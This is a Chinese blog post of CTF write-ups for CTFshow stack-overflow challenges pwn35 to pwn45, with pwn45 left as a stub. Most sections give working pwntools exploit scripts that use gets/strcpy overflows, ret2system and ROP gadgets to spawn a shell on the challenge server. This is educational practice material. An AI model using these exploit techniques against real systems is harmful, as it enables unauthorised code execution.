<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="pwn35 strcpy函数没有长度限制，可以产生栈溢出  cyclic足够长度数据直接打 pwn36 gets函数无长度限制，可以栈溢出  这边需要让get_flag函数执行  123456789101112from pwn import *context(log_level&#x3D;&amp;#x27;debug&amp;#x27;,arch&#x3D;&amp;#x27;i386&amp;#x27;,os&#x3D;&amp;#x27;linux&amp;#x27;">
<meta property="og:type" content="article">
<meta property="og:title" content="CTFshow 栈溢出">
<meta property="og:url" content="http://example.com/2024/01/22/pwn35-80/index.html">
<meta property="og:site_name" content="d3f4u1t">
<meta property="og:description" content="pwn35 strcpy函数没有长度限制，可以产生栈溢出  cyclic足够长度数据直接打 pwn36 gets函数无长度限制，可以栈溢出  这边需要让get_flag函数执行  123456789101112from pwn import *context(log_level&#x3D;&amp;#x27;debug&amp;#x27;,arch&#x3D;&amp;#x27;i386&amp;#x27;,os&#x3D;&amp;#x27;linux&amp;#x27;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240120165855101.png">
<meta property="og:image" content="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121152420772.png">
<meta property="og:image" content="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121160335278.png">
<meta property="og:image" content="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121160434623.png">
<meta property="og:image" content="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121162736783.png">
<meta property="og:image" content="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121164107195.png">
<meta property="og:image" content="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121163526448.png">
<meta property="og:image" content="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121163615281.png">
<meta property="og:image" content="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121183608682.png">
<meta property="og:image" content="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121183808441.png">
<meta property="article:published_time" content="2024-01-21T16:00:00.000Z">
<meta property="article:modified_time" content="2024-01-25T04:02:27.201Z">
<meta property="article:author" content="d3f4u1t">
<meta property="article:tag" content="刷题">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240120165855101.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>CTFshow 栈溢出</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     --><!--
       --><li><a href="/links/">友链</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2024/01/23/hexoproblem/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2024/01/20/pre/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/01/22/pwn35-80/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/01/22/pwn35-80/&text=CTFshow 栈溢出"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/01/22/pwn35-80/&title=CTFshow 栈溢出"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/01/22/pwn35-80/&is_video=false&description=CTFshow 栈溢出"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=CTFshow 栈溢出&body=Check out this article: http://example.com/2024/01/22/pwn35-80/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/01/22/pwn35-80/&title=CTFshow 栈溢出"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/01/22/pwn35-80/&title=CTFshow 栈溢出"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/01/22/pwn35-80/&title=CTFshow 栈溢出"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/01/22/pwn35-80/&title=CTFshow 栈溢出"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/01/22/pwn35-80/&name=CTFshow 栈溢出&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/01/22/pwn35-80/&t=CTFshow 栈溢出"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn35"><span class="toc-number">1.</span> <span class="toc-text">pwn35</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn36"><span class="toc-number">2.</span> <span class="toc-text">pwn36</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn37"><span class="toc-number">3.</span> <span class="toc-text">pwn37</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn38"><span class="toc-number">4.</span> <span class="toc-text">pwn38</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn39"><span class="toc-number">5.</span> <span class="toc-text">pwn39</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn40"><span class="toc-number">6.</span> <span class="toc-text">pwn40</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn41"><span class="toc-number">7.</span> <span class="toc-text">pwn41</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn42"><span class="toc-number">8.</span> <span class="toc-text">pwn42</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn43"><span class="toc-number">9.</span> <span class="toc-text">pwn43</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn44"><span class="toc-number">10.</span> <span class="toc-text">pwn44</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn45"><span class="toc-number">11.</span> <span class="toc-text">pwn45</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        CTFshow 栈溢出
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">d3f4u1t</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-01-21T16:00:00.000Z" class="dt-published" itemprop="datePublished">2024-01-22</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%AE%89%E5%85%A8/">二进制安全</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/%E5%88%B7%E9%A2%98/" rel="tag">刷题</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="pwn35"><a href="#pwn35" class="headerlink" title="pwn35"></a>pwn35</h2><blockquote>
<p>strcpy函数没有长度限制，可以产生栈溢出</p>
</blockquote>
<p><code>cyclic</code>足够长度数据直接打</p>
<h2 id="pwn36"><a href="#pwn36" class="headerlink" title="pwn36"></a>pwn36</h2><blockquote>
<p>gets函数无长度限制，可以栈溢出</p>
</blockquote>
<p>这边需要让get_flag函数执行</p>
<p><img src="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240120165855101.png" alt="image-20240120165855101"></p>
<div class="highlight-wrap" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;i386&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#io=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">io=remote(<span class="string">&quot;pwn.challenge.ctf.show&quot;</span>,<span class="number">28105</span>)</span><br><span class="line">get_flag_addr=<span class="number">0x8048586</span></span><br><span class="line">offset=<span class="number">0x28</span>+<span class="number">0x4</span></span><br><span class="line">payload=offset*<span class="string">b&#x27;a&#x27;</span>+p32(get_flag_addr)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure></div>

<h2 id="pwn37"><a href="#pwn37" class="headerlink" title="pwn37"></a>pwn37</h2><p>与上题相似</p>
<div class="highlight-wrap" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;i386&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;pwn&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#io=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">io=remote(<span class="string">&quot;pwn.challenge.ctf.show&quot;</span>,<span class="number">28274</span>)</span><br><span class="line">backdoor=elf.sym[<span class="string">&#x27;backdoor&#x27;</span>]</span><br><span class="line">offset=<span class="number">0x12</span>+<span class="number">0x4</span></span><br><span class="line">payload=offset*<span class="string">b&#x27;a&#x27;</span>+p32(backdoor)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recv()</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure></div>

<h2 id="pwn38"><a href="#pwn38" class="headerlink" title="pwn38"></a>pwn38</h2><p><img src="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121152420772.png" alt="image-20240121152420772"></p>
<p>0xA+0x8，64位平衡堆栈</p>
<div class="highlight-wrap" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary pwn --only &quot;ret&quot;</span><br></pre></td></tr></table></figure></div>
<p><img src="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121160335278.png" alt="image-20240121160335278"></p>
<div class="highlight-wrap" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;pwn&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#io=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">io=remote(<span class="string">&quot;pwn.challenge.ctf.show&quot;</span>,<span class="number">28278</span>)</span><br><span class="line">backdoor=elf.sym[<span class="string">&#x27;backdoor&#x27;</span>]</span><br><span class="line">offset=<span class="number">0xA</span>+<span class="number">0x8</span></span><br><span class="line">ret=<span class="number">0x400287</span></span><br><span class="line">payload=offset*<span class="string">b&#x27;a&#x27;</span>+p64(ret)+p64(backdoor)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recv()</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure></div>

<h2 id="pwn39"><a href="#pwn39" class="headerlink" title="pwn39"></a>pwn39</h2><p><img src="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121160434623.png" alt="image-20240121160434623"></p>
<p>存在后门函数，但是<code>/bin/sh</code>没在<code>system</code>里</p>
<p><img src="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121162736783.png" alt="image-20240121162736783"></p>
<div class="highlight-wrap" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#payload=[填充]+[system@plt]+[4bytes填充]+[参数]</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;i386&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;pwn&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#io=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">io=remote(<span class="string">&quot;pwn.challenge.ctf.show&quot;</span>,<span class="number">28274</span>)</span><br><span class="line">system=elf.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">offset=<span class="number">0x12</span>+<span class="number">0x4</span></span><br><span class="line">binsh=<span class="number">0x8048750</span></span><br><span class="line">payload=offset*<span class="string">b&#x27;a&#x27;</span>+p32(system)+p32(<span class="number">0</span>)+p32(binsh)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recv()</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure></div>

<h2 id="pwn40"><a href="#pwn40" class="headerlink" title="pwn40"></a>pwn40</h2><blockquote>
<p>64位和32位不同，参数不是直接放在栈上，而是优先放在寄存器rdi,rsi,rdx,rcx,r8,r9。这几个寄存器放不下时才会考虑栈。</p>
<p>64位汇编传参，当参数少于7个时， 参数从左到右放入寄存器: <em><strong>rdi, rsi, rdx, rcx, r8, r9</strong></em>。 当参数为7个以上时，前 6 个与前面一样， 但后面的依次从 “右向左” 放入栈中，即和32位汇编一样。</p>
</blockquote>
<p><img src="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121164107195.png" alt="image-20240121164107195"></p>
<div class="highlight-wrap" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary pwn --only &#x27;pop|ret&#x27; | grep rdi</span><br></pre></td></tr></table></figure></div>

<p><img src="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121163526448.png" alt="image-20240121163526448"></p>
<div class="highlight-wrap" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary pwn --only &#x27;ret&#x27;</span><br></pre></td></tr></table></figure></div>

<p><img src="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121163615281.png" alt="image-20240121163615281"></p>
<div class="highlight-wrap" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#payload=[填充]+[pop_rdi_ret]+[参数]+[system@plt]</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;pwn&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#io=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">io=remote(<span class="string">&quot;pwn.challenge.ctf.show&quot;</span>,<span class="number">28207</span>)</span><br><span class="line">system=elf.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">offset=<span class="number">0xA</span>+<span class="number">0x8</span></span><br><span class="line">binsh=<span class="number">0x400808</span></span><br><span class="line">rdi_addr=<span class="number">0x00000000004007e3</span></span><br><span class="line">ret_addr=<span class="number">0x00000000004004fe</span></span><br><span class="line">payload=offset*<span class="string">b&#x27;a&#x27;</span>+p64(rdi_addr)+p64(binsh)+p64(ret_addr)+p64(system)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recv()</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure></div>

<h2 id="pwn41"><a href="#pwn41" class="headerlink" title="pwn41"></a>pwn41</h2><p>没有<code>/bin/sh</code>，用<code>sh</code>代替</p>
<blockquote>
<ol>
<li><p>system(“&#x2F;bin&#x2F;sh”) ： </p>
<p>在Linux和类Unix系统中，&#x2F;bin&#x2F;sh 通常是一个符号链接，指向系统默认的shell程序（如Bash或Shell）。因此，使用 system(“&#x2F;bin&#x2F;sh”) 会启动指定的shell程序，并在新的子进程中执行。 </p>
<p>这种方式可以确保使用系统默认的shell程序执行命令，因为 &#x2F;bin&#x2F;sh 链接通常指向默认shell的可执行文件。 </p>
</li>
<li><p>system(“sh”) ：</p>
<p> 使用 system(“sh”) 会直接启动一个名为 sh 的shell程序，并在新的子进程中执行。 这种方式假设系统的环境变量 $PATH 已经配置了能够找到 sh 可执行文件的路径，否则可能会导致找不到 sh 而执行失败。</p>
</li>
</ol>
</blockquote>
<p>总结来说， <code>system(&quot;/bin/sh&quot;)</code>是直接指定了系统默认的shell程序路径来执行命令，而<code>system(&quot;sh&quot;)</code>则依赖系统的环境变量<code>$PATH</code> 来查找<code>sh</code>可执行文件并执行。如果系统的环境变量设置正确，这两种方式是等效的。</p>
<div class="highlight-wrap" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;i386&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;pwn&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#io=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">io=remote(<span class="string">&quot;pwn.challenge.ctf.show&quot;</span>,<span class="number">28187</span>)</span><br><span class="line">system=elf.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">offset=<span class="number">0x12</span>+<span class="number">0x4</span></span><br><span class="line">sh_addr=<span class="number">0x80487ba</span></span><br><span class="line">payload=offset*<span class="string">b&#x27;a&#x27;</span>+p32(system)+p32(<span class="number">0</span>)+p32(sh_addr)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recv()</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure></div>

<h2 id="pwn42"><a href="#pwn42" class="headerlink" title="pwn42"></a>pwn42</h2><div class="highlight-wrap" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;pwn&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#io=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">io=remote(<span class="string">&quot;pwn.challenge.ctf.show&quot;</span>,<span class="number">28248</span>)</span><br><span class="line">system=elf.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">offset=<span class="number">0xA</span>+<span class="number">0x8</span></span><br><span class="line">binsh=<span class="number">0x400872</span></span><br><span class="line">rdi_addr=<span class="number">0x0000000000400843</span></span><br><span class="line">ret_addr=<span class="number">0x000000000040053e</span></span><br><span class="line">payload=offset*<span class="string">b&#x27;a&#x27;</span>+p64(rdi_addr)+p64(binsh)+p64(ret_addr)+p64(system)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recv()</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure></div>

<h2 id="pwn43"><a href="#pwn43" class="headerlink" title="pwn43"></a>pwn43</h2><p>无<code>/bin/sh</code>，考虑劫持gets函数然后人为写入</p>
<p><img src="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121183608682.png" alt="image-20240121183608682"></p>
<p>直接查看可写的段</p>
<p><img src="https://picture-1312836458.cos.ap-beijing.myqcloud.com/image-20240121183808441.png" alt="image-20240121183808441"></p>
<div class="highlight-wrap" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;i386&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io=process(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">elf=ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">libc=elf.libc</span><br><span class="line"></span><br><span class="line">gets_plt=elf.plt[<span class="string">b&quot;gets&quot;</span>]</span><br><span class="line">sys_addr=elf.plt[<span class="string">b&quot;system&quot;</span>]</span><br><span class="line"></span><br><span class="line">bss_addr=<span class="number">0x804b800</span></span><br><span class="line"></span><br><span class="line">payload=cyclic(<span class="number">0x6c</span>+<span class="number">4</span>)+p32(gets_plt)+p32(sys_addr)+p32(bss_addr)+p32(bss_addr)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.sendline(<span class="string">b&quot;sh;&quot;</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p>栈溢出后劫持gets函数，调用system函数，第一个bss_addr作为gets的参数传入写入栈上，第二个bss_addr作为system的参数传入</p>
</blockquote>
<h2 id="pwn44"><a href="#pwn44" class="headerlink" title="pwn44"></a>pwn44</h2><div class="highlight-wrap" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io=process(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">elf=ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"></span><br><span class="line">gets_plt=elf.plt[<span class="string">b&quot;gets&quot;</span>]</span><br><span class="line">sys=elf.plt[<span class="string">b&quot;system&quot;</span>]</span><br><span class="line">pop_rdi=<span class="number">0x00000000004007f3</span></span><br><span class="line">buf=<span class="number">0x603000</span>-<span class="number">20</span></span><br><span class="line">ret=<span class="number">0x00000000004004fe</span></span><br><span class="line">payload=cyclic(<span class="number">0xA</span>+<span class="number">8</span>)+p64(pop_rdi)+p64(buf)+p64(ret)+p64(gets_plt)+p64(pop_rdi)+p64(buf)+p64(ret)+p64(sys)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.sendline(<span class="string">b&quot;sh;&quot;</span>)</span><br><span class="line">io.recv()</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p>1.利用 pop_rdi 指令将 buf2 的地址加载到rdi寄存器中，因为在调用gets函数之前，你需要将输入的缓冲区的地址（即buf2的地址）传递给gets函数，以便gets函数知道将输入数据存储在哪个缓冲区中<br>2.调用 gets 函数，以 buf2 的地址作为参数，从用户输入中读取数据，并将其存储在buf2中<br>3.再次利用 pop_rdi 指令将 buf2 的地址加载到rdi 寄存器中<br>4.调用 system 函数，以 buf2 的地址作为参数</p>
</blockquote>
<h2 id="pwn45"><a href="#pwn45" class="headerlink" title="pwn45"></a>pwn45</h2><p>无<code>system</code>无<code>/bin/sh</code>，存在write函数和puts函数，可以作为泄露libc的泄露函数</p>
